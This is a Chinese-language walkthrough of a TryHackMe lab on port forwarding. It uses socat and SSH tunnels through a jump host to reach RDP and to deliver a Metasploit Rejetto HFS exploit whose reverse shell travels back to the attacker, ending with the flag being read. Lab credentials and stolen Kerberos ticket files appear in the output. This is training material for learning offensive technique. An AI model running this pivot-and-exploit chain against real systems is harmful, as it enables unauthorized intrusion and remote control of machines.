Task 7 Port Forwarding
一樣先登入,看看有什麼東西:
┌──(kali㉿kali)-[~]
└─$ ssh za\\jasmine.stanley@thmjmp2.za.tryhackme.com
za\jasmine.stanley@thmjmp2.za.tryhackme.com's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
za\jasmine.stanley@THMJMP2 C:\Users\jasmine.stanley>cd ..
za\jasmine.stanley@THMJMP2 C:\Users>cd ..
za\jasmine.stanley@THMJMP2 C:\>cd tools
za\jasmine.stanley@THMJMP2 C:\tools>dir
Volume in drive C has no label.
Volume Serial Number is F4B0-FCB9
Directory of C:\tools
12/14/2023 10:54 AM <DIR> .
12/14/2023 10:54 AM <DIR> ..
08/10/2021 03:22 PM 1,355,680 mimikatz.exe
06/14/2022 08:27 PM 45,272 nc64.exe
04/19/2022 09:17 PM 1,078,672 PsExec64.exe
03/16/2022 05:19 PM 906,752 SharpHound.exe
06/19/2022 05:38 AM <DIR> socat
12/14/2023 10:54 AM 1,583 [0;1dd90f]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,647 [0;3e4]-0-0-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,609 [0;3e4]-0-1-40a50000-THMJMP2$@DNS-thmdc.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,611 [0;3e4]-0-2-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,615 [0;3e4]-0-3-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,611 [0;3e4]-0-4-40a50000-THMJMP2$@cifs-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,497 [0;3e4]-2-0-60a10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,497 [0;3e4]-2-1-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,647 [0;3e7]-0-0-40a50000-THMJMP2$@cifs-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:16 AM 1,647 [0;3e7]-0-0-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,571 [0;3e7]-0-1-40a10000.kirbi
12/14/2023 10:54 AM 1,647 [0;3e7]-0-2-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,593 [0;3e7]-1-0-00a10000.kirbi
12/14/2023 10:16 AM 1,497 [0;3e7]-2-0-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,497 [0;3e7]-2-0-60a10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,497 [0;3e7]-2-1-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,685 [0;44c599]-0-0-40a10000-t1_toby.beck@HTTP-thmiis.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,569 [0;44c599]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi
12/14/2023 10:54 AM 1,587 [0;5ffc2]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,587 [0;60056]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,587 [0;87f24]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,719 [0;8d1d3]-0-0-40a50000-t1_toby.beck@LDAP-THMDC.za.tryhackme.com.kirbi
12/14/2023 10:54 AM 1,569 [0;8d1d3]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi
27 File(s) 3,422,945 bytes
3 Dir(s) 8,866,508,800 bytes free
za\jasmine.stanley@THMJMP2 C:\tools>cd socat
za\jasmine.stanley@THMJMP2 C:\tools\socat>
在SSH不可用的情況下,我們也可以選擇使用socat來執行連接埠轉發,雖然socat不像SSH那麼靈活,但它能允許我們以更簡單的方式轉發連接埠。使用socat進行連接埠轉送的缺點是,我們需要先將它傳送到跳板主機上(本小節範例中的跳板機為PC-1) ,因此,使用這種連接埠轉送技術會比使用SSH更容易被安全團隊偵測到,但是在沒有其他選項可用的情況下,我們可以嘗試使用socat進行連接埠轉送。
目標是透過RDP連接到THMIIS,如果我們嘗試直接從攻擊機連接到THMIIS,那麼我們會發現連接埠3389會被THMIIS的防火牆過濾,因此該連接埠不能直接被我們使用。實際上,THMIIS上的端口3389已經啟動並運行,但是我們只能嘗試從跳板機THMJMP2上進行訪問,通過使用socat(該工具可以在THMJMP2上的C:\tools\socat\路徑中找到) ,我們可以轉送RDP端口,並使其在THMJMP2上可用,然後我們再使用攻擊機進行連接。
為此,我們將使用以下參數來運行socat:
za\jasmine.stanley@THMJMP2 C:\tools\socat>socat TCP4-LISTEN:13389,fork TCP4:THMIIS.za.tryhackme.com:3389
一旦上述連結成功,我們就可以用t1_thomas.moore用戶身分來登入THMIIS機器。
┌──(kali㉿kali)-[~]
└─$ xfreerdp /v:THMJMP2.za.tryhackme.com:13389 /u:t1_thomas.moore /p:MyPazzw3rd2020 +clipboard
[07:08:05:737] [281990:281991] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[07:08:05:738] [281990:281991] [WARN][com.freerdp.crypto] - CN = THMIIS.za.tryhackme.com
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - The hostname used for this connection (THMJMP2.za.tryhackme.com:13389)
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - Common Name (CN):
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - THMIIS.za.tryhackme.com
[07:08:05:739] [281990:281991] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for THMJMP2.za.tryhackme.com:13389 (RDP-Server):
Common Name: THMIIS.za.tryhackme.com
Subject: CN = THMIIS.za.tryhackme.com
Issuer: CN = THMIIS.za.tryhackme.com
Thumbprint: 6a:cf:f4:09:ee:93:08:cb:1b:76:4e:a0:69:a9:d1:8b:31:35:69:8b:a2:f6:d0:a3:81:ae:61:10:0d:59:37:de
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[07:08:13:958] [281990:281991] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[07:08:13:958] [281990:281991] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[07:08:13:010] [281990:281991] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[07:08:13:014] [281990:281991] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[07:08:16:995] [281990:281991] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
找到flag如下:
假設THMDC伺服器上正在運行Rejetto HFS的脆弱版本,我們所面臨的問題是目標伺服器的防火牆規則限制了我們對於易受攻擊的連接埠的訪問,因此我們只能嘗試使用跳板機THMJMP2進行攻擊。此外,來自THMDC的出站連線只允許其本地網路中的其他電腦使用,因此我們無法直接在THMDC上將反向shell連接傳送給攻擊機;執行針對Rejetto HFS的漏洞攻擊也需要攻擊者託管一個HTTP伺服器來觸發最終的有效載荷,但是由於THMDC的出站連接不被允許發送到攻擊機上,所以我們可能需要找到一種方法來在目標網路中的其他機器上託管一個Web伺服器,這一點都不方便。幸運的是:我們可以使用連接埠轉送技術來克服我們剛才描述的所有問題。
讓我們看看如何進行漏洞攻擊。首先,它將連接到HFS端口(Metasploit中的RPORT)以觸發第二個連接,而第二個連接將使用SRVPORT針對攻擊機,該端口將對應一個用於傳送有效載荷的web伺服器。最後,攻擊者的有效載荷將在目標電腦上被執行並向攻擊機的LPORT發送反向shell:
基於上述漏洞利用,我們可以使用SSH將一些連接埠從攻擊機上轉送到目標網路中的THMJMP2(託管Web伺服器的連接埠SRVPORT和接收反向shell的連接埠LPORT)上,並以THMJMP2機器作為跳板以存取到THMDC上的端口RPORT。我們需要在兩個方向上轉送三個端口,因此上述漏洞利用過程中的所有互動都可以透過THMJMP2進行代理:
Rejetto HFS將監聽THMDC上的端口80,所以我們需要進行遠端端口轉發,使用THMJMP2將端口通過SSH隧道回連到攻擊機。由於Attackbox的80端口已經被其他服務所佔據,所以我們需要將THMDC上的80端口與Attackbox目前沒有使用的一些端口連接起來(我們在此處使用端口) 8888,當我們在THMJMP2中運行ssh轉發端口時,我們必須在命令中添加以下內容:-R 8888:thmdc.za.tryhackme.com:80。
對於SRVPORT和LPORT,我們可以選擇兩個隨機連接埠。在本小節中,我們可以設定SRVPORT=7879和LPORT=9899(當然也可以設定使用其他端口號),如果我們在此選擇兩個相同的端口,並試圖轉發它們時,就會得到一個錯誤提示,並表示這樣的端口在THMJMP2上已經被使用。
為了將端口從攻擊機轉發到THMJMP2,我們將使用本地端口轉發技術,我們需要將-L *: 7879:127.0.0.1:7879和-L *: 9999:127.0.0.1:9899添加到我們的ssh命令中,這將幫助我們綁定THMJMP2上的兩個端口,並將任何連接通過SSH隧道回連到我們的攻擊機。
10.50.77.41是攻擊機的IP,6666 port是SRVPORT、7878是LPORT。
za\jasmine.stanley@THMJMP2 C:\tools\socat>ssh tunneluser@10.50.77.41 -R 8888:thmdc.za.tryhackme.com:80 -L *:6666
:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N
ssh: connect to host 10.50.77.41 port 22: Connection refused
開啟ssh服務
┌──(kali㉿kali)-[~]
└─$ sudo service ssh start
成功綁定port:
za\jasmine.stanley@THMJMP2 C:\tools\socat>ssh kali@10.50.77.41 -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0
.0.1:6666 -L *:7878:127.0.0.1:7878 -N
kali@10.50.77.41's password:
接下來就可用msf打過去:
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: The use command supports fuzzy searching to try and
select the intended module, e.g. use kerberos/get_ticket or use
kerberos forge silver ticket
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.42-dev ]
+ -- --=[ 2375 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
[*] Using exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasp
loit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an add
ress on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost thmjmp2.za.tryhackme.com
lhost => thmjmp2.za.tryhackme.com
msf6 exploit(windows/http/rejetto_hfs_exec) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf6 exploit(windows/http/rejetto_hfs_exec) > set lport 7878
lport => 7878
msf6 exploit(windows/http/rejetto_hfs_exec) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 exploit(windows/http/rejetto_hfs_exec) > set srvport 6666
srvport => 6666
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8888
rport => 8888
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:7878
[*] Using URL: http://thmjmp2.za.tryhackme.com:6666/VvqGXf0nPw
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /VvqGXf0nPw
[!] Tried to delete %TEMP%\aeLDnuCew.vbs, unknown result
[*] Command shell session 1 opened (127.0.0.1:7878 -> 127.0.0.1:59524) at 2023-12-15 07:31:29 -0500
[*] Server stopped.
Shell Banner:
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\hfs>
-----
C:\hfs>
C:\hfs>dir
dir
Volume in drive C is Windows
Volume Serial Number is 1634-22A9
Directory of C:\hfs
12/15/2023 11:12 AM <DIR> .
12/15/2023 11:12 AM <DIR> ..
12/15/2023 12:31 PM <DIR> %TEMP%
06/22/2022 02:23 AM 22 flag.txt
08/24/2014 08:18 PM 2,498,560 hfs.exe
2 File(s) 2,498,582 bytes
3 Dir(s) 50,116,362,240 bytes free
C:\hfs>type flag.txt
type flag.txt
THM{FORWARDING_IT_ALL}
aaa
的理解與運用_@hoyi-23_https://static.coderbridge.com/images/covers/default-post-cover-1.jpg)
